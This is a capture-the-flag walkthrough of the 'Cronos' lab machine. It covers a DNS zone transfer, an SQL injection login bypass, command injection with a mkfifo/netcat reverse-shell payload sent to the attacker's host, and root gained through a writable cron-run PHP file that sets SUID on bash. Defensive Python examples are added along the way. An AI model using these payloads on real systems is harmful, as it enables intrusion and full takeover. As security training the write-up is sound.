# Cronos

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2F9J1P8cU5VcFA2WFSR2ev%2Fcronos.png?alt=media\&token=1b8434ed-f75d-43bd-9e9b-10e9b20c7a05)

## Enumeration

As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions running on them.

The following nmap command quickly scans the whole port range of the target and saves the output to a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.13 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, the fastest nmap timing template (aggressive enough to drop results on a lossy link; note that the saved scan header below shows the run without it).
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allPorts* file.

```
# Nmap 7.92 scan initiated Wed Jun 29 00:34:52 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.13
Nmap scan report for 10.10.10.13
Host is up (0.060s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
53/tcp open  domain
80/tcp open  http

# Nmap done at Wed Jun 29 00:35:06 2022 -- 1 IP address (1 host up) scanned in 13.90 seconds
```

Now that we know which ports are open, let's identify the services and versions running on them. The following command scans these ports in more depth and saves the result to a file:

> nmap -sC -sV -p22,53,80 10.10.10.13 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into a file, in this case the *targeted* file.

```
# Nmap 7.92 scan initiated Wed Jun 29 00:35:23 2022 as: nmap -sCV -p22,53,80 -oN targeted 10.10.10.13
Nmap scan report for 10.10.10.13
Host is up (0.047s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jun 29 00:35:40 2022 -- 1 IP address (1 host up) scanned in 17.48 seconds
```

If we take a look at the website, we'll see the *Apache2* default page with not much going on.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FeU4g6eR1dE35kMNTokII%2Fimage.png?alt=media\&token=156be209-fb83-4d08-987c-77e9725ceee5)

But since port *53* (DNS) is open, we can ask the server for a reverse (PTR) lookup of its own address with *nslookup* and hopefully get a domain name.

> nslookup

```
> server 10.10.10.13
Default server: 10.10.10.13
Address: 10.10.10.13#53
> 10.10.10.13
13.10.10.10.in-addr.arpa        name = ns1.cronos.htb.
```

That gives us `ns1.cronos.htb`, so the zone is `cronos.htb`. Now we can try a zone transfer (AXFR) with *dig*: if the server allows transfers to anyone, it hands over every record in the zone, including all the subdomains.

> dig axfr @10.10.10.13 cronos.htb

```
; <<>> DiG 9.18.1-1-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13
admin.cronos.htb.       604800  IN      A       10.10.10.13
ns1.cronos.htb.         604800  IN      A       10.10.10.13
www.cronos.htb.         604800  IN      A       10.10.10.13
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 60 msec
;; SERVER: 10.10.10.13#53(10.10.10.13) (TCP)
;; WHEN: Wed Jun 29 17:12:53 CEST 2022
;; XFR size: 7 records (messages 1, bytes 203)
```
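The zone transfer above is itself the finding: a name server that answers AXFR for any client leaks every host in the zone. To turn that output into something usable, here is a small parser, added as an example and not part of the original writeup, that reads dig's AXFR output and emits `/etc/hosts` lines for every A/AAAA record. The embedded zone text is constructed from the records shown above rather than fetched live; on a live box you would pass the captured output of `dig axfr @10.10.10.13 cronos.htb` to `parse_axfr()` instead.

```python
import re
from collections import defaultdict

# Constructed sample: the AXFR answer as dig prints it (copied from the records above, not a live query).
SAMPLE_AXFR = """\
; <<>> DiG 9.18.1-1-Debian <<>> axfr @10.10.10.13 cronos.htb
;; global options: +cmd
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13
admin.cronos.htb.       604800  IN      A       10.10.10.13
ns1.cronos.htb.         604800  IN      A       10.10.10.13
www.cronos.htb.         604800  IN      A       10.10.10.13
;; Query time: 60 msec
"""

# name  TTL  IN  TYPE  rdata  (dig's default presentation format for one resource record)
RR_LINE = re.compile(r"^(\S+)\s+\d+\s+IN\s+(A|AAAA|CNAME|NS|MX|TXT|SOA)\s+(.+)$")


def parse_axfr(text):
    """Return (name, type, rdata) tuples from dig's AXFR output, skipping comment lines."""
    records = []
    for line in text.splitlines():
        if not line or line.startswith(";"):
            continue
        m = RR_LINE.match(line)
        if m:
            name, rtype, rdata = m.groups()
            records.append((name.rstrip("."), rtype, rdata.strip()))
    return records


def hosts_lines(records):
    """Group A/AAAA records by address and emit one /etc/hosts line per address."""
    by_addr = defaultdict(list)
    for name, rtype, rdata in records:
        if rtype in ("A", "AAAA") and name not in by_addr[rdata]:
            by_addr[rdata].append(name)
    return [f"{addr}\t{' '.join(names)}" for addr, names in sorted(by_addr.items())]


if __name__ == "__main__":
    for line in hosts_lines(parse_axfr(SAMPLE_AXFR)):
        print(line)
```

The parser deliberately keeps NS, CNAME and MX records too: a CNAME or MX pointing outside the zone is often the next pivot, and on a real engagement those names are worth resolving as well.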

Let's add the `cronos.htb` and the `admin.cronos.htb` domain names to the `/etc/hosts` file.

> nano /etc/hosts

```
# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
10.10.10.13    cronos.htb    admin.cronos.htb
```

If we now browse to `cronos.htb`, we'll see a `CRONOS` landing page with nothing interesting on it.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2Fb9zupVeShNPDUIhCpws1%2Fimage.png?alt=media\&token=9375f7e7-a5f5-4416-8125-6925eaec5860)

But `admin.cronos.htb` presents a login panel.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FaGAZkQkFUjLqE4PQXq04%2Fimage.png?alt=media\&token=e8ad7d2f-e85d-49a5-ad3f-b5add087e8f5)

## Exploitation

I tried to bypass the login page with a basic *SQL injection* payload: the username `' or 1=1-- -` and a random password. The single quote closes the username string literal, `or 1=1` makes the `WHERE` clause always true, and `-- -` comments out the rest of the query, including the password check.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FOJzIY4T3gyWGFIyNWvy3%2Fimage.png?alt=media\&token=261ad6e5-52d3-46ce-86ad-24014eef75ae)

And it worked.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2F1o9qaXJita0HMkAKfPhv%2Fimage.png?alt=media\&token=1aed1f23-878c-4205-b920-cc92e7d82f3f)
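The page does not show the panel's server-side code, so the following is an added example, not the machine's own login handler: it reconstructs the string-concatenated query that the observed bypass implies, runs it against a constructed in-memory SQLite users table, and puts the parameterised version beside it. The table, credentials and function names are assumptions made for the demo. One caveat: MySQL (which a Laravel box typically uses) only treats `--` as a comment when followed by whitespace, which is why the payload ends in `-- -`; SQLite accepts a bare `--`, so the same payload works in both.

```python
import sqlite3

PAYLOAD = "' or 1=1-- -"   # the username used against the panel above


def make_db():
    """Constructed in-memory users table standing in for the panel's backend (demo only)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'S3cretPassw0rd!')")  # constructed credentials
    return db


def build_vulnerable_query(username, password):
    """String concatenation: user input becomes part of the SQL text itself."""
    return (f"SELECT username FROM users WHERE username='{username}' "
            f"AND password='{password}'")


def login_vulnerable(db, username, password):
    """Returns the matched username, or None. With PAYLOAD the WHERE clause becomes
    username='' or 1=1 and everything after -- is ignored, so the first row wins."""
    row = db.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """Parameterised query: the quote in the payload is data, never SQL."""
    row = db.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query(PAYLOAD, "whatever"))
    print("vulnerable login returns:", login_vulnerable(db, PAYLOAD, "whatever"))
    print("parameterised login returns:", login_safe(db, PAYLOAD, "whatever"))
```

Printing the built query is the quickest way to see the bypass: everything from `-- -` onwards, including `AND password='whatever'`, is a comment.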

The panel lets us run *traceroute* or *ping* against an address we supply. I pinged my own machine, and it worked.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FzjprYMst1TAxWBYOoZy2%2Fimage.png?alt=media\&token=39af1037-e558-4d49-a6a2-089e92fbc156)

So the website is passing our input to a system command. If that input is not sanitised, we can append a second command after the ping (OS command injection) that sends us a reverse shell. First, let's start a *netcat* listener on port *4444*.

> nc -lvnp 4444

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

Now, if we select *ping* and submit the following payload (the leading `;` terminates the ping command and `$(...)` runs our shell pipeline), we get a reverse shell as the `www-data` user and can grab the user flag.

> ;$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.8 4444 >/tmp/f)

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FYDA6HCesQZfwUmQS5ZRh%2Fimage.png?alt=media\&token=029e3b81-8f0b-407b-aecc-7d07f8ac5326)

```
listening on [any] 4444 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.13] 45316
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ cat /home/noulis/user.txt
115a1db22c9ec5497b1c7f5dd9816560
```
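The root cause is the panel handing user input to a shell. Below is an added example, not the panel's own code, that reproduces the vulnerable pattern and the fix side by side: the vulnerable version interpolates the target into a shell string (`shell=True`), so `;`, `$(...)` and `|` are interpreted, while the hardened version validates the target against a strict character class and passes an argv list, so no shell is involved. `echo` stands in for `ping` so the demo runs offline, and the `;echo INJECTED` payload is a constructed, harmless stand-in for the `;$(... nc ...)` reverse-shell payload above.

```python
import re
import subprocess

# IPv4 literals and DNS names only: no ';', '$', '(', '|', '&', whitespace or quotes can get through.
HOSTNAME_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")

PAYLOAD = "10.10.14.8;echo INJECTED"   # constructed stand-in for the reverse-shell payload


def vulnerable_ping_command(target):
    """Builds the command the way the panel appears to: raw interpolation into one shell string."""
    return f"echo ping -c 1 {target}"   # echo replaces ping so this runs offline


def run_vulnerable(target):
    """shell=True hands the string to /bin/sh, so metacharacters in target are honoured."""
    out = subprocess.run(vulnerable_ping_command(target), shell=True,
                         capture_output=True, text=True)
    return out.stdout


def run_hardened(target):
    """Validate first, then pass an argv list: the target is exactly one argument, never parsed."""
    if not HOSTNAME_RE.fullmatch(target):       # fullmatch: a trailing newline does not slip past '$'
        raise ValueError(f"rejected target: {target!r}")
    out = subprocess.run(["echo", "ping", "-c", "1", target],
                         capture_output=True, text=True)
    return out.stdout


def hardened_rejects(target):
    """True when the hardened handler refuses the input."""
    try:
        run_hardened(target)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable:", repr(run_vulnerable(PAYLOAD)))
    print("hardened rejects payload:", hardened_rejects(PAYLOAD))
    print("hardened:", repr(run_hardened("10.10.14.8")))
```

Allow-listing the characters a hostname may contain is the important half; switching to an argv list alone would still let an attacker pass extra flags to `ping`, which is why the validation comes first.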

## Privilege Escalation

First, let's upgrade to an interactive *TTY* shell.

> script /dev/null -c /bin/bash

Then I press `Ctrl+Z` and execute the following command on my local machine:

> stty raw -echo; fg
>
> reset
>
> Terminal type? xterm

Next, I export a few variables:

> export TERM=xterm
>
> export SHELL=bash

Finally, I run the following command on my local machine:

> stty size

```
51 236
```

And set the same dimensions on the victim machine:

> stty rows 51 columns 236

If we look at the system crontab, we'll see that every minute *root* runs the Laravel `artisan` *PHP* script:

> cat /etc/crontab

```
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
#
```

Looking at the script's permissions, `www-data` owns it, so our shell can modify a file that root executes every minute.

> ls -l /var/www/laravel/artisan

```
-rwxr-xr-x 1 www-data www-data 1646 Apr  9  2017 /var/www/laravel/artisan
```
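The general check behind this step is "which root cron jobs run something I can write to?". Here is a small checker, added as an example and not part of the original writeup, that parses system crontab text in the `/etc/crontab` format shown above, pulls every absolute path out of each root job's command line, and reports the ones the current user can write. The crontab text is constructed from the entries above; the `writable` callback is injectable so the logic can be exercised against paths that do not exist on the machine running it, and `__main__` demonstrates it with a real temporary file. It only handles the six-field system format (user column present), not `@reboot`-style entries or per-user crontabs.

```python
import os
import re
import tempfile

# Constructed crontab text modelled on the /etc/crontab entries shown above.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
"""

# m h dom mon dow user command  (system crontab format; user-level crontabs have no user field)
CRON_LINE = re.compile(r"^\s*(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")


def parse_system_crontab(text):
    """Return (user, command) pairs for each job line, skipping comments, blanks and VAR=value lines."""
    jobs = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#") or "=" in line.split()[0]:
            continue
        m = CRON_LINE.match(line)
        if m:
            jobs.append((m.group(6), m.group(7)))
    return jobs


def referenced_paths(command):
    """Absolute paths mentioned anywhere in a command string, script arguments included."""
    return re.findall(r"(?<![\w-])(/[\w./-]+)", command)


def writable_root_jobs(text, writable=lambda p: os.path.isfile(p) and os.access(p, os.W_OK)):
    """(command, path) pairs for root jobs that reference a regular file the current user can write.
    `writable` is a callback so the check can run against constructed paths."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for path in referenced_paths(command):
            if writable(path):
                findings.append((command, path))
    return findings


if __name__ == "__main__":
    # Demo against a real file: a temp file we own stands in for /var/www/laravel/artisan.
    with tempfile.NamedTemporaryFile("w", suffix=".php", delete=False) as f:
        f.write("<?php\n")
    crontab = SAMPLE_CRONTAB + f"* * * * *       root    php {f.name} >> /dev/null 2>&1\n"
    for command, path in writable_root_jobs(crontab):
        print(f"[!] root job '{command}' executes writable file {path}")
    os.unlink(f.name)
```

On the box, the same logic applied to `/etc/crontab` flags `/var/www/laravel/artisan` for the `www-data` shell. Interpreter scripts like this one are the easy case; a writable directory on the job's `PATH`, or a writable `run-parts` directory, gives the same result and is worth checking alongside.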

We can overwrite it with *PHP* code that sets the *SUID* bit on `/bin/bash`, so that we can run bash with root's effective UID.

> echo '<?php system("chmod u+s /bin/bash"); ?>' > /var/www/laravel/artisan

After waiting a minute for the cron job to fire, the *bash* binary has the *SUID* bit set:

> ls -l /bin/bash

```
-rwsr-xr-x 1 root root 1037528 Jun 24  2016 /bin/bash
```

Finally, `bash -p` keeps the effective UID instead of dropping privileges, and we can take the root flag.

> bash -p

```
bash-4.3# whoami
root
bash-4.3# cat /root/root.txt 
f29ac94d898df107590adef9b2968361
```
